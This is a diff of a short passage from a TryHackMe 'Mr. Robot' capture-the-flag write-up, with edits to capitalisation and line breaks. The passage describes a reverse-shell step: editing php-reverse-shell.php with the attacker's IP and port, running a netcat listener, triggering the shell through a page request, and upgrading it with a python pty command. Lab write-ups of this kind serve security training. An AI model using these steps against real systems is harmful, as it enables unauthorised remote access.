gr33nm0nk2802/TryHackMe/Mr.Robot.md

 /usr/share/webshells/php/php-reverse-shell.php
 ```

-we modify the ip and port to our ip and port and then start listening on netcat for connections.
+We modify the Ip and port to our ip and port and then start listening on netcat for connections.

 ```(netcat server)
 	nc -nlvp 4000
 ```

-next we visit to any random page on http://$IP/random
-and our reverse shell is executed.
+Next we visit to any random page on http://$IP/random and our reverse shell is executed.

 Getting proper terminal from rawshell

 ```(proper shell using python)
 	python -c 'import pty; pty.spawn("/bin/bash")'
 ```